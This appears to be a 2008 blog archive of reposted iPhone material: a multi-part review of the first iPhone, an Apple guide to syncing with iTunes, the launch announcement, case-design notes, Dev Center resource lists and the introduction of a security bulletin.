Sent messages on your iPhone are not synced to Mail.app's sent folder (you can automatically CC, but not BCC, yourself on every outgoing iPhone message, though).
Filters in Mail.app are not applied to incoming mail on the iPhone.
The iPhone keeps its own set of non-contact addresses you manually enter -- these are not copied over from Mail.app. What's more, the iPhone mail application has a number of other harsh shortcomings:
There is no BCC.
Messages on IMAP cannot even be marked as read.
No ability "mark all / selected" as read.
No empty trash option.
There is a save to draft, but there is no spellcheck. (We suppose that's because Apple thinks spellcheck should be inline with auto-correction as you type.)
Users can only download and view the latest 200 messages from their server -- there is no "retrieve all" messages option. This is a very bad thing when you just got off a trans-continental flight and it's time to triage some serious email. If we haven't already driven the point home, for heavy email users such as ourselves, the iPhone didn't even come close to cutting the mustard. Email is, in fact, the weakest aspect of the whole device. While the Yahoo push-IMAP worked beautifully (and we do mean flawlessly -- push mail was delivered instantaneously), the Gmail integration requires POP access, and basically has similar issues with fetching messages, magnified by the different organizational requirements the web mail service has. One Engadget editor called the Gmail integration "a crime against humanity" -- and let's be frank, it's not "years ahead of everything else," it's actually years behind even the simple Java Gmail app Google released a while ago.To us, a productivity device is anything that helps us Get Things Done while we're out and about, and email, web, and SMS are the holy trinity on a smartphone device. If any part of that trifecta is crap, the whole device may as well be crap. And unfortunately for us, even if you can put up with the keyboard, the Mail client is so awful it actually makes us wish Apple made a Foleo for the iPhone. An iFoleo, if you will. Anyway, if you're anything like us, this is a major, major dealbreaker.
Safari
Ease of use aside, there's no question that the iPhone's build of Safari serves up the most true-to-PC web browsing experience available for a phone today. Opera Mini and S60's native browser (which happens to be based on the same core as Safari, coincidentally) do commendable jobs, but the iPhone has taken it to the next level. Anyone who has used the Nokia 770 or N800 internet tablets will be roughly familiar with what the iPhone is trying to do here: render a page faithfully without trying to work any fit-to-screen magic, and give the user convenient options for zooming in on text.
Of course, it could be argued that the iPhone shouldn't even be trying to present a PC-like rendering of pages because it necessitates zooming. Emphasis on "necessitates" here -- you really can't go to any mainstream site on the iPhone and expect to glean useful information from it without dragging, double tapping, pinching, and unpinching your way around. Zooming in on a page produces an interesting transient display artifact: everything looks really fuzzy for just a moment, as though you've overzoomed on a low-resolution picture. (Microsoft's new Deepfish browser has a similar effect on zoom-in.) Granted, after a while the browsing motions become a little more natural, and we'd always prefer to have the option of seeing and interacting with sites that don't have dedicated mobile versions. WAP is supported, but Safari isn't detected as a mobile browser, so you need to specifically navigate to the WAP version if the site you're trying to visit has automatic browser detection.
Bookmarks are supported and automatically synchronized with Safari on the host computer; adding a new bookmark is a simple matter of hitting the "+" button in the address bar, naming the bookmark, selecting a destination folder, and hitting Save. Mobile Safari's meager four-button toolbar along the bottom edge dedicates a button for this, along with forward, backward, and tabs. The tab implementation is pretty clever -- all you see on the tab button is a count of the number of tabs currently open (or nothing if your current page is the only tab). Tapping the button takes you to a Cover Flow-esque display that shows a small view of each tab; flicking left and right changes tabs and tapping opens a tab. A red X in the upper left and corner of each tab's display allows you to close it.
Of all the iPhone's wares, Safari most thoroughly implements rotation detection, which makes sense considering that most sites are designed with a landscape display in mind. The phone can be held vertically, 90 degrees clockwise, or 90 degrees counterclockwise, and the currently displayed page will be rotated (complete with a nifty animation, naturally) to fill up the screen. Safari is also the only iPhone app to implement the horizontal keyboard, which some will find far easier to use than its more ubiquitous vertical counterpart. One small complaint we have here is that if you have the keyboard up and rotate the phone, the page and keyboard won't reorient -- you have to manually close the keyboard with the Done button, at which point the page will do its thing and you can bring up the keyboard again in the correct orientation.On the iPhone, Safari is boiled down to the very most basic set of features necessary to do its thing, but the rendering engine is true to the original, for better or for worse. Take Gmail, for example; just like Safari on the desktop, there's a screwy looking little box immediately to the left of the subject line of each email in the inbox if you have personal level indicators enabled. It works, but it's a very Safari-esque experience -- Safari users will feel right at home, but folks coming from other browsers might run into the occasional surprise when hitting up sites optimized for Internet Explorer or Firefox.On the subject of Gmail, Ajax-enabled sites are hit or miss. One gotcha is that there's no gesture to simulate a double-click, so it's impossible to open up a new IM window in Meebo by double-tapping a contact, for example (though we were able to initiate one using the IM Buddy button on the buddy list). Google Documents worked okay for reading text and spreadsheets, but we weren't able to edit anything. A good rule of thumb here: if it's not designed specifically for the iPhone, keep your expectations to a minimum until you try it out yourself.
Unfortunately, Safari seems to share more than just a rendering engine with its distant S60-based cousin. Specifically, we've had some problems with stability -- the browser will often unceremoniously disappear from time to time. We have no problem opening it back up (and the offending page works the second time more often than not), but it's still a pain in the ass. It seems like the number of open tabs (and hence, memory consumption) might be at least one of the culprits, but we've yet to find any reproducible scenarios. Mobile browsers aren't typically the most stable pieces of software around, so we've gotta say we're not terribly surprised. Here's hoping future firmware updates shore up the goods just a little bit.
iPod / media functionalityHistorically, we haven't been huge fans of the iPod. We've found its interface generally simple, but irritating to navigate; its lack of numerous basic features other devices have long since had, like the ability to create multiple playlists on the go, has persisted as the iPod has undergone very conservative functionality additions through the years. Whereas our biggest complaint about the iPod -- its dire lack of codec support -- hasn't been addressed in the iPhone, its user interface definitely has.
Playing back music, movies, TV shows, podcasts, etc. has never been easier on an iPod, or more more seamlessly integrated into a phone. Most of the iPod interface has been revised to take advantage of the iPhone's massive touchscreen, so navigating artists and albums in lists is simple, where before it was a tedious, thumb-joint-popping experience. Tilting the device horizontally allows you to browse your music in Cover Flow mode, a novelty of breakthrough proportions. Tapping an album in Cover Flow mode lets you select which track to play.
When browsing in list mode, you get the same alphabet column on the right as you do with contacts. Again, keyboard search would have been nice here, but it's still far more livable than the click wheel. If you put your iPhone in sleep while listening to music, when waking it up instead of your usual background on the unlock screen you'll see the cover art of the album you're listening to, and the name of the track beneath the current time -- an extremely useful bit of glanceable information, saving you from having to dig through your mobile to see what's playing.
The media integration with the rest of the device is obviously far better than on any mobile we've seen to date -- but it's not without its issues. It's wonderful seeing SMS messages pop up while watching movies, for instance, but if you load up a YouTube video while listening to music, the audio automatically fades out when the video starts, but doesn't come back when the video ends. This is counter to the phone experience, where an incoming call pauses your music and brings it back when the call is over. We also noticed that even while under heavy load multitasking, the music would never skip or falter, just crash.
We managed to continuously crash the iPod app while listening to music and doing other things, namely browsing. We wouldn't call it incredibly unstable, but we wouldn't say it's rock solid, either. Movie playback did seem very stable though, even when skipping around and playing video for long periods of time. (It may also be of note that even when playing video for hours on end the device hardly ever even got warm to the touch.) The biggest upshot we found on the media playback, though, was the iPhone's Herculean battery life. We've seen other reviews' media playback results vary, but ours seemed to jump far ahead of even Apple's lofty expectations.Playing relatively high bitrate VGA H.264 videos, our iPhone lasted almost exactly 9 freaking hours of continuous playback with cell and WiFi on (but Bluetooth off). Yeah, we had to pick our jaws up off the floor, too. So by our tests, you could watch a two hour movie and drain off a little more than 22% of the battery -- totally acceptable for trip-taking and the like.Our music testing showed similarly outstanding results. Playing back 160-192Kbps MP3s, our iPhone pushed about 29 hours and 30 minutes music playback. To put that in perspective, the Apple claims the iPod nano gets about 24 hours playback on a full charge, and the iPod a scant 14 - 20 hours.To do a little simple math, you could watch two hours of video, listen to 8 straight hours of music, and still have only drained off less than half your device's capacity -- that is, if your iPhone's battery works as well as ours. (Read: your battery life may differ.) Still, if that's a good estimate of what users can expect from their device's power drain, you should have little issue making the iPhone your music and video player, in addition to your cellphone.

Syncing iPhone and iPod touch with your computer

2008-02-13T10:27:00.000-08:00

When you connect iPhone or iPod touch to your computer, items are automatically synced between the two according to your preferences. You can, for example, enter phone numbers and addresses of friends and family members on your computer, connect iPhone or iPod touch to sync, then unplug iPhone or iPod touch and tap a friend's name on the touch screen to call.
You can sync
Contacts—names, phone numbers, addresses, email addresses, and so on
Calendars—appointments and events
Email account settings (only on iPhone)
Web bookmarks
Music and audiobooks
Movies
TV shows
Podcasts
Photos
You only have to set which items are synced in iTunes on your computer once. After that, just connect iPhone or iPod touch to start a sync.
Contacts, calendars, and bookmarks are synced from (or to) your computer, so if you add, change, or delete them on iPhone or iPod touch, they are changed on your computer, and vice versa. You can also sync contacts with your Yahoo! Address Book (Except yahoo.co.jp accounts).
Email account settings (on iPhone only), music, movies, TV shows, podcasts, and photos are synced one-way, from your computer to iPhone (though you can import photos taken with iPhone to your computer).
If you like, you can set iPhone or iPod touch to sync with only a portion of what's on your computer. For example, you might want to sync only a group of contacts from your address book, or you may want to sync only songs from certain playlists so you don't fill up iPhone or iPod touch with all your music.
Setting Up Syncing
You use iTunes on your computer to set up which items are synced. Make sure you have the most recent version of iTunes (On a PC, open iTunes and choose Help > Check for Updates. On a Mac, open iTunes and choose iTunes > Check for Updates.
Step 1: Connect iPhone or iPod touch
Connect iPhone or iPod touch to your computer using the included cable. You can connect the cable from your computer directly to iPhone or iPod touch, or connect the cable from your computer to the Apple Universal Dock (available separately) and put iPhone or iPod touch in the dock. By default, iTunes opens automatically.
Select iPhone or iPod touch in the iTunes source list.
Step 2: Set Up Which Items Are Synced
Follow the steps below for each item you want to sync.
Set contacts to sync
Any Contacts you've chosen to sync, such as those in Address Book or Microsoft Entourage on a Mac or Windows Address Book (Outlook Express) or Microsoft Outlook on a PC, will be synced with iPod touch. If you sync with Yahoo! Address Book, you only need to click Configure to enter your new login information when you change your Yahoo! ID or password after you've set up syncing.
Click the Info tab in iTunes, then do one of the following:
If you're using a Mac, select "Sync Address Book contacts."
If you're using a PC, select "Sync contacts from" and then choose Yahoo! Address Book, Windows Address Book, or Outlook from the pop-up menu.
Select "All contacts," or select "Selected groups" and select the groups you want to sync.
If you're using a Mac, select "Sync Yahoo! Address Book contacts" if you also want to sync with your Yahoo! contacts.
You only need to click Configure when you change your Yahoo! ID or password after you've set up syncing. Click Configure and enter your new login information.
Note: Syncing won't delete any contact in Yahoo! Address Book that contains a Messenger ID, even if you've deleted the contact from your address book on iPhone or your computer. To delete a contact containing a Messenger ID, log in to your Yahoo! account online and delete the contact using Yahoo! Address Book.
On a Mac, when you sync Address Book contacts with iPhone or iPod touch, any other address books you've set to sync with .Mac, such as your contacts in Microsoft Entourage, will also be synced with iPhone or iPod touch.
Set calendars to sync
When you sync Calendars with iPod touch, calendars you've set to sync, such as your events and tasks in iCal and Microsoft Entourage on a Mac or Microsoft Outlook on a PC, will be synced with iPod touch.
Click the Info tab in iTunes, then do one of the following:
If you're using a Mac, select "Sync iCal calendars." Then choose "All calendars," or choose "Selected calendars" and select the calendars you want to sync. Then, from the pop-up menu, choose the calendar on your computer to update with events you create directly on your iPhone or iPod touch.
If you're using a PC, select "Sync Outlook calendars."
On a Mac, when you sync iCal calendars with iPhone or iPod touch, any other calendars you've set to sync with .Mac, such as your events and tasks in Microsoft Entourage, will also be synced with iPhone or iPod touch.
Set email accounts to sync (only on iPhone)
You can sync email account settings from Mail on a Mac, or Microsoft Outlook or Outlook Express on a PC.
Click the Info tab in iTunes, then do one of the following:
If you're using a Mac, select "Sync selected Mail Accounts."
If you're using a PC, select "Sync selected mail accounts from" and then choose Outlook or Outlook Express from the pop-up menu.
Select the accounts you want to sync.
Set bookmarks to sync
You can sync bookmarks from Safari on a Mac, or Internet Explorer and Safari on a PC. Click the Info tab in iTunes and select Sync Bookmarks.
Set music, podcasts, or video to sync
Click the Music, Video, or Podcasts tab and select Sync, Sync Music, Sync TV shows, or Sync Movies.
Set sync options. You can sync all items, selected items or playlists, or a number of recent, unwatched, or unplayed items. In the Music tab, you can elect to also sync music videos. If you sync music, audiobooks are synced too.
Set photos to sync
You can sync iPhone or iPod touch with photos in iPhoto 4.0.3 or later on a Mac, or Photoshop Album 2.0 or later or Photoshop Elements 3.0 or later on a PC. Or you can sync with any folder on your computer that contains images.
Click the Photos tab and select "Sync photos from."
From the pop-up menu, do one of the following:
If your using a Mac, choose iPhoto or your Pictures folder.
If you're using a PC, choose Photoshop Album, Photoshop Elements, or your My Pictures folder.
Choose Folder, then choose any folder on your computer that has images inside.
Choose "All photos," or choose "Selected folders" or "Selected albums" and choose the folders or albums you want to sync.
Step 3: Sync iPhone or iPod touch
Click Apply in the lower-right corner of the screen. Your computer syncs with iPhone or iPod touch according to your settings.
The first time you sync iPhone or iPod touch, you are asked if you want to merge data, replace data on the service, or replace the data on your computer. After that, anytime you connect iPhone or iPod touch to your computer, iTunes opens and syncs with iPhone or iPod touch according to your settings.
Note: When syncing with Yahoo! Address Book, you do not have the option to replace the data on Yahoo!.
You can adjust sync settings anytime iPhone or iPod touch is connected to your computer. You can only connect and sync with one iPhone or iPod touch at the same time. If you need to sync more than one iPhone or iPod touch, disconnect one before connecting the other.
Important: You should be logged in to your own user account on the computer before connecting iPhone or iPod touch. If you connect more than one iPhone or iPod touch to the same user account, use the same sync settings for each.
Important: Information about products not manufactured by Apple is provided for information purposes only and does not constitute Apple's recommendation or endorsement. Please contact the vendor for additional information.

iPhone review, part 1: Hardware, interface, keyboard

2008-02-13T10:25:00.000-08:00

The last six months have held a whirlwind of hype surrounding the iPhone the likes of which we've rarely seen; an unbelievable amount of mainstream consumer electronics users -- not just Engadget-reading technology enthusiasts -- instantly glommed onto the idea of a do-it-all smartphone that's as easy to use as it is powerful. The fact is, there's only a very short list of properly groundbreaking technologies in the iPhone (multi-touch input), and a very long list of things users are already upset about not having in a $600 cellphone (3G, GPS, A2DP, MMS, physical keyboard, etc.). If you're prepared to buy into the hype, and thusly, the device, it's important that purchase (and its subsequent two year commitment to AT&T) not be made for features, but for the device's paradigm-shifting interface.
The hardwareIndustrial designWe're just going to come out and say it: the iPhone has the most beautiful industrial design of any cellphone we've ever seen. Yes, it's a matter of taste, and while we imagine some won't agree, we find it hard to resist the handset's thoughtful minimalism and attention to detail.
The edges of the beautiful optical-grade glass facade fit seamlessly with its stainless steel rim; the rear is an incredibly finely milled aluminum, with a hard, black plastic strip at the bottom, covering the device's antenna array, and providing small, unsightly grids of holes for speaker and mic audio. On the rear is the slightly recessed 2 megapixel camera lens, a reflective Apple logo, and some information about the device (IMEI, serial, etc.) in nearly microscopic print. (Sorry, iPhone engravings don't seem to be available yet for online customers.)
The iPhone's curves and geometry make it incredibly comfortable to hold. It fits well in the hand horizontally and vertically (completely one-handed operation is a snap in portrait mode), and its slim profile lets it slip into even a tight pocket with little effort. The device feels incredibly sturdy and well balanced -- no end seems any heavier than another. Every edge blends perfectly with the next (which will probably help fight gunk buildup over time), and holding the device to one's ear is comfortable enough, although not as comfortable as, say, the HTC Touch.
Our only real complaint with the device's design isn't one we take lightly: Apple went to the trouble of giving the iPhone a standard 3.5mm headphone jack, but the plug is far too recessed to use most headphones with -- we tested a variety, and were highly unimpressed with how many fit. What's the point of a standard port if it's implemented in a non-standard way? Apple might have at least included an extender / adapter for this, but didn't. Luckily, the iPhone earbuds sound very decent, and also include a minuscule, clicky in-line remote / mic -- but that's not going to alleviate the annoyance for the myriad users with expensive Etys or Shures who have to pay another $10 for yet another small part to lose.The display
The iPhone features the most attractive display we've ever seen on a portable device of this size, by far and bar none. While its 160ppi resolution isn't quite photorealistic, the extremely bright 3.5-inch display does run at 480 x 320, making it one of the highest pixel-density devices around today (save the Toshiba G900's mind-popping 3-inch 800 x 480 display). But pixel density doesn't necessarily matter, it's how your device uses the screen real estate it's got. Instead of printing microscopic text, as Windows Mobile often does with high resolution displays (see: HTC's Universal and Advantage), iPhone text looks smooth and natural in every application -- everything on-screen is eminently readable.
The screen also provides an excellent outdoor viewing experience. With optical properties reminiscent of transflective displays, the iPhone remains completely readable (if a only bit washed out) even in direct sunlight. Unfortunately, the display's viewing angle left a little something to be desired, and the rumors about the glass face being an absolute fingerprint magnet are totally true: this thing picks up more smudges than almost any touchscreen device we've ever used. Honestly though, we'd attribute this to the fact that unlike most other smartphones, you are exempt from using a stylus on the iPhone's capacitive display, meaning you must touch it with your bare finger to do almost anything.Thankfully, like the rest of the phone, the glass face feels extremely sturdy, and one should have absolutely no hesitation in wiping it off on their jeans or sleeve -- we've yet to produce a single scratch on the thing, and we understand others testing under more rigorous circumstances (like deliberately trying to key its face up) have also been unable to mar its armor.The sensorsOne of the more unique features in the iPhone is its trio of sensors (orientation, light, and proximity -- the latter two are behind the glass right above the earpiece) which help the device interact with its user and the world at large. Some of these sensors are more useful than others. The light sensor (for dimming the backlight) is great for saving power, but its use doesn't compare to the the other two sensors, which worked like champs. The proximity sensor, which prevents you from accidentally interacting with the screen while the iPhone is pressed against your ear, switches off the display at about 0.75-inches away; the screen switches back on after you pull away about an inch. This very useful automatic process took a little getting used to from us oldschool touchscreen users, who have long since grown accustomed to diligently turning off the screen while on a call, or holding our smartphones to our ear ever so gently.The orientation sensor also worked well enough. Although you can't turn the phone on its head, when browsing in Safari you can do a 180, jumping quickly from landscape left to landscape right. The iPhone would occasionally find itself confused by the odd angles one sometimes carries and holds devices at, but in general we didn't expect the orientation sensor to work as well as it did.Button layout
Despite the iPhone's entirely touchscreen-driven interface, all of its external buttons are mechanical and have a distinct, clicky tactility. There is, of course, the home button on the face, which takes you back to the main menu; along the left side of the unit is the volume up / down rocker (which is clearly identifiable by touch), and a ringer on / off switch -- something we wish all cellphones had, but that far too few actually do. Turning off the ringer briefly vibrates the device to let the user know rings are off; it's worth noting that turning the ringer off doesn't turn off all device audio, so if you hit play on a song in iPod mode, audio will still come out the speaker if you don't have headphones inserted.On the top of the unit is the SIM tray (each unit comes pre-packaged with an AT&T SIM already inserted), which pops out by depressing an internal switch with a paperclip. Finally, the largest perimeter button is the sleep / wake switch, which does as you'd imagine. Press it (and swipe the screen) to wake up the device, or press it to put it to sleep; hold it (and swipe the screen) down to shut it off completely. (You can also use it turn off the ringer - -one click -- or shunt a call to voicemail -- two clicks -- if someone rings you.) The headphones
The iPhone comes bundled with a standard set of iPod earbuds, but there are two differences from the kind that comes with your regular old iPod. First, these earbuds don't have the small plastic cable separator slide that helps keep your cables from getting tangled. Second, on the right channel cable about halfway up you'll find a very slim, discreet mic / music toggle. When listening to music, click it once to pause, or twice to skip tracks; when a call comes through, click it once to pick up, and again to hang up.That same in-line piece also picks up your voice for the call, and it sounds pretty good -- some people on the other end of the line said it sounds even better than the iPhone's integrated mic. For those worried that there would be issues with interference, put your mind at ease. We heard absolutely no cell radio interference over the headset, even when we wrapped it four times around the iPhone antenna, and sandwiched it between a second cellphone making a call. The headphones are an essential and amazing accessory that makes the seamless media and phone experiences of the device possible. We only wish Apple managed to integrate an inline volume switch in there too, since that's really the only essential control it lacks.Unfortunately for us, iPod headphones just don't fit our ears, so no matter how good they may sound, they're unusable since we can't seem keep them in longer than 30 seconds. (We typically prefer canalphones, they can't really go anywhere.) Since the included headphones are the only ones on the market right now that can interact with the iPod function, have an inline mic, and, of course, listen to audio, you're kind of stuck with Apple's buds if you want to get the most out of your iPhone. The same also applies to the expensive phones you invested in, which probably won't fit in the recessed jack anyway: even if you get an adapter, you still won't get the full experience.Apple's included headphones are about 42-inches long (3.5 feet), just about the perfect length to reach from your pocket to your head with a little extra slack. You'd be surprised how many cellphone manufacturers screw this up with bundled headphones that are way too long, or way too short.The dock, charging
The included dock is up to par for Apple's typically high standards -- it feels very solid and sturdy with no visible mold lines, and is capped on the bottom by a solid rubber base (with a nearly hidden vent for letting sound in and out of the iPhone's speaker and mic) to keep it in place. On its rear is the usual cable connector and line out. We thought the dock props the iPhone way too vertically -- about 80°, significantly more upright than the stock iPod dock we compared it to. If you're using it on a desk, you'll probably wish Apple angled it back a little so you're not leaning over to fumble with your phone like some miniature monolith.
Charging the iPhone is an easy enough affair. Pulling power from its adapter (and not a computer's USB), we were able to quick-charge it from 0% to 90% in just under two hours, but it took us almost another hour and a half to get that last ten percent. We also twice ran into this weird bug, where charging the iPhone from 0% power would deactivate the screen. The only way to recover was to soft-reset the phone. No big deal, just irritating. It's probably also worth mentioning that going from totally shut off to fully booted, the iPhone is up and running in under 30 seconds.Other accessoriesApple also includes a microfiber polishing cloth -- a welcome addition, but the device's sturdy glass will stand up to rubs on most of your clothes, so don't bother carrying it along if you're planning to just brush off some dust or residue left by your face / ears / fingers, etc. Also included is an extremely small power brick, and USB connector cable. Worth noting: the iPhone connector cable doesn't include tensioned clips, like most iPod connectors -- just pull it out, nothing messy to get caught and broken, and fewer moving parts in general.
User interfaceIf there's anything revolutionary, as Apple claims, about the iPhone, it's the user interface that would be nominated. Countless phones make calls, play movies and music, have maps, web browsers, etc., but almost none seem able to fully blend the experience -- which is part of the reason people flipped out at the idea of an iPhone. The device's user interface does all this with panache, but it's not without a number of very irritating issues. Before we get into those issues, however, we should quickly rundown the functions of the iPhone's primarily gesture-based input system.iPhone gesturesDrag - controlled scroll up / down through listsFlick - quickly scrolls up / down through listsStop - while scrolling, tap and hold to stop the moving listSwipe - flick from left to right to change panes (Safari, weather, iPod) and delete items (mail, SMS)Single tap - select itemDouble tap - zooms in and out (all apps), zooms in (maps)Two-finger single tap - zooms out (maps only)Pinch / unpinch - zoom in and out of photos, maps, SafariAs you can probably already tell, gestures in the iPhone are by no means consistent. By and large one can count on gestures to work the same way from app to app, but swipes, for example, will only enable the delete button in mail and SMS -- if you want to delete selected calls from your call log, a visual voicemail message, world clock, or what have you, you've got to find another way. Swiping left to right takes you back one pane only in iPod, and two-finger single tap only zooms out in Google maps -- none of the other apps that use zooming, like Safari, and photos.These kinds of inconsistencies are worked around easily enough, but add that much more to the iPhone learning curve. And yes, there is definitely a learning curve to this device. Although many of its functions are incredibly easy to use and get used to, the iPhone takes radically new (and often extremely simplified and streamlined) approaches to common tasks for mobile devices.Another rather vexing aspect of the iPhone's UI is its complete inability to enable user-customizable themes -- as well as having inconsistent appearances between applications. Users can set their background (which shows up only during the unlock screen and phone calls), but otherwise they're stuck with the look Apple gave the iPhone, and nothing more. This is very Apple, and plays right into Steve's reputation as a benevolent dictator; he's got better taste than most, but not much of a penchant for individuality.
Even still, Apple's chosen appearance varies from app to app. Some apps have a slate blue theme (mail, SMS, calendar, maps, Safari, settings), some have a black theme (stocks, weather), some have a combination blue / black theme (phone, iPod, YouTube, clock), some have a straight gray theme (photos, camera), and some have an app-specific theme (calculator, notes). Even the missing-data-background is inconsistent: checkerboard in Safari, line grid in Google maps. There's little rhyme or reason in how or why these three themes were chosen, but unlike OS X's legacy pinstripes and brushed metal looks, there's really no reason why the iPhone should have an inconsistent appearance between applications.
Keyboard
Since its announcement, the iPhone's single biggest x-factor has been its virtual keyboard -- primarily because the quality of its keyboard can make or break a mobile device, and of the numerous touchscreen keyboards released over the years, not one has proven a viable substitute for a proper physical keyboard. We've been using the keyboard as much as possible, attempting to "trust" its auto-correction and intelligent input recognition, as Apple urges its users to do in order to make the transition from physical keys. (The iPhone uses a combination of dictionary prediction and keymap prediction to help out typing.)The whole idea of a touchscreen is a pretty counterintuitive design philosophy, if you ask us. Nothing will ever rid humans of the need to feel physical sensations when interacting with objects (and user interfaces). Having "trust" in the keyboard is a fine concept, and we believe it when people say they're up to speed and reaching the same input rates as on physical keyboards. But even assuming we get there, we know we'll always long for proper tactile feedback. That said, we're working on it, and have found ourselves slowly growing used to tapping away at the device with our stubby thumbs.As for the actual process of typing, one hindrance we've had thus far is that despite being a multi-touch system, the keyboard won't recognize a second key press before you've lifted off the first -- it requires single, distinct key presses. But the worst thing about the keyboard is that some of the methods it plies in accelerating your typing actually sacrifice speed in some cases. For example, there is no period key on the main keyboard -- you have to access even the most commonly used symbols in a flipped over symbols keyboard. This is almost enough to drive you crazy. (We really, REALLY wish Apple would split the large return button into two buttons: one for return, one for period.)
Caps lock is also disabled in the system by default, but even if you enable it in settings (and then double-tap to turn it on), you still can't hold down shift for the same effect -- it's either caps on, or you have to hit shift between each letter. Also, whether you're in upper or lower case, the letters on the keyboard keys always look the same: capitalized. (This makes it difficult to see at a glance what case of text you're about to input, especially since when using two thumbs your left thumb always hovers over the shift key.) Oh, and don't hit space when typing out a series of numbers, otherwise you'll get dropped back into the letter keyboard again.We also found the in-line dictionary tool to be more cumbersome than helpful. Supposedly, to add a word that's not in the dictionary, type in your word, then when you get an autocorrect value, just press on that word and the word you typed will be added to the dict file (uhh, ok). But you can also accidentally add words to your dictionary by typing out a word, dismissing the autocorrect dropdown by adding another letter, then backspacing over it. Yeah, for some reason that adds a word to the dictionary file, too. And believe it or not, this confusing little problem caused us to add a number of bum words to the dict file (which you can only keep or clear in its entirety -- and no you can't back it up, either).
On the up side, the horizontal keyboard (which is only enabled when typing into Safari while browsing horizontally) is a much more palatable experience. The keys are far larger, resulting in drastically fewer typing mistakes. (We sincerely hope Apple will enable horizontal input for all its iPhone apps that require keyboard input.) The horizontal web keyboard also has very convenient previous / next buttons for tabbing through fields. The keyboard you're given when entering URLs is one of the most brilliant bits we've seen in the device, and is an incredible time-saver. Since there are almost never spaces in URLs, instead users have shortcuts to ".", "/", and ".com". Finally, the magnification loupe is the best touchscreen cursor positioning method we've seen to date in a mobile device. Too bad you can't highlight and cut / copy / paste text with the iPhone.So what's the long and short of the keyboard story? We're still getting used to it, but for a touchscreen keyboard it could have been a lot worse -- and a whole lot better. Some among the Engadget staff have been able to pick it up quickly, others, not so much -- your mileage may vary. We have to wonder though, what would it take to get Steve to give us a proper physical keyboard for this mother, anyway? (We already smell the cottage industry brewing.)

iPhone review

2008-02-13T10:24:00.000-08:00

The first solid info anyone heard about the iPhone was in December of 2004, when news started to trickle out that Apple had been working on a phone device with Motorola as its manufacturing partner. About ten months later, under the shadow of the best-selling iPod nano, that ballyhooed device debuted -- the ROKR E1 -- a bastard product that Apple never put any weight behind, and that Motorola was quick to forget. The relationship between Apple and Motorola soon dissolved, in turn feeding the tech rumor mill with visions of a "true iPhone" being built by Apple behind the scenes. After years of rumor and speculation, last January that device was finally announced at Macworld 2007 -- and here we are, just over six months later -- the iPhone, perhaps the most hyped consumer electronics device ever created, has finally landed. And this is the only review of it you're going to need.We've gone into serious detail here, so here's the review split into multiple parts. Trust us, it's a quick read. Enjoy!Part 1: Hardware, interface, keyboard Part 2: Phone, Mail, Safari, iPod Part 3: Apps and settings, camera, iTunes, wrap-up

The Apple iPhone

2008-02-13T10:23:00.000-08:00

Capping literally years of speculation on perhaps the most intensely followed unconfirmed product in Apple's history -- and that's saying a lot -- the iPhone has been announced today. Yeah, we said it: "iPhone," the name the entire free world had all but unanimously christened it from the time it'd been nothing more than a twinkle in Stevie J's eye (comments, Cisco?). Sweet, glorious specs of the 11.6 millimeter device (that's frickin' thin, by the way) include a 3.5-inch 480 x 320 touchscreen display with multi-touch support and a proximity sensor to turn off the screen when it's close to your face, 2 megapixel cam, 4GB or 8 GB of storage, Bluetooth 2.0 with EDR and A2DP, WiFi that automatically engages when in range, and quad-band GSM radio with EDGE. Perhaps most amazingly, though, it somehow runs OS X with support for Widgets, Google Maps, and Safari, and iTunes (of course) with CoverFlow out of the gate. A partnership with Yahoo will allow all iPhone customers to hook up with free push IMAP email. Apple quotes 5 hours of battery life for talk or video, with a full 16 hours in music mode -- no word on standby time yet. In a twisted way, this is one rumor mill we're almost sad to see grind to a halt; after all, when is the next time we're going to have an opportunity to run this picture? The 4GB iPhone will go out the door in the US as a Cingular exclusive for $499 on a two-year contract, 8GB for $599. Ships Stateside in June, Europe in fourth quarter, Asia in 2008.

Designing cases for iPod and iPhone

2008-02-13T10:22:00.002-08:00

Are you a case vendor looking to design a carrying case for iPhone or iPod? The following dimensional drawings will get you started with all the measurements you need for current and past products.Design Considerations for iPhone and iPod touch
If you are developing a carrying case for iPhone and iPod touch you need to take into consideration antenna location as well as the locations of any sensors which should always remain uncovered.
The touch interface senses the presence of one or more fingers on its surface. Any material between the surface and a user's hand, even a very thin sheet of plastic, can affect the performance of the touch interface. Touch screen covers must be thinner than 0.3mm and should be designed so that there are no air gaps between the cover and the screen surface. Covers may not be electrically conductive.
Dimensional Drawings
iPod 3G Dimensions (PDF)
iPod 4G Dimensions (PDF)
iPod mini Dimensions (PDF)
iPod photo Dimensions (PDF)
iPod 30/60GB photo Dimensions (PDF)
iPod nano Dimensions (PDF)
iPod 5G 30GB Dimensions (PDF)
iPod 5G 60/80GB Dimensions (PDF)
iPod shuffle Dimensions (PDF)
iPod nano (2nd Generation) Dimensions (PDF)
iPod shuffle (2nd Generation) Dimensions (PDF)
iPod nano (3rd Generation) Dimensions (PDF)
iPod classic 80GB Dimensions (PDF)
iPod classic 160GB Dimensions (PDF)
iPod touch Dimensions (PDF)
iPhone Dimensions (PDF)

iPhone Dev Center

2008-02-13T10:22:00.001-08:00

Web Development Guidelines
Learn the latest techniques on mobile browser-based user experience design, and ensure users of your web application the best experience on iPhone.
Read Guidelines

iPhone Tech Talk Videos
Watch iPhone engineers from the recent iPhone Tech Talks discuss everything from user interface design to optimizing your web applications and content for iPhone.
iPhone Development Introduction
iPhone User Interface Design
Managing Content and Synced Data for iPhone
Safari on iPhone Part I: Compatibility
Safari on iPhone Part II: Optimization
Safari on iPhone Part III: iPhone Applications
Designing Web Content for iPhone

Sample Code
Choose from a range of Sample Code projects that provide development and user interface design techniques for interactive and standards-based design on iPhone.
iPhoneButtons
iPhoneListPatterns
iSudoku
makeiPhoneRef Movie
Puzzler

iPhone Reference Library
Browse the iPhone Reference Library for release notes, technical documentation and guides on developing and optimizing Web 2.0 applications and content for iPhone
Getting Started with iPhone
Safari Web Content Guide for iPhone
iPhone Human Interface Guidelines
Safari HTML Reference
Safari CSS Reference
Web Kit DOM Programming Topics
Web Kit DOM Reference
JavaScript Coding Guidelines for Mac OS X
Exporting Movies for iPod, Apple TV and iPhone
Preparing Content for Safari 3 and WebKit
Safari Release Notes for iPhone

About the security content of iPhone v1.1.3 and iPod touch v1.1.3

2008-02-13T10:19:00.000-08:00

This document describes the security content of iPhone v1.1.3 and iPod touch v1.1.3.
For the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website.
For information about the Apple Product Security PGP Key, see "How to use the Apple Product Security PGP Key."
Where possible, CVE IDs are used to reference the vulnerabilities for further information.
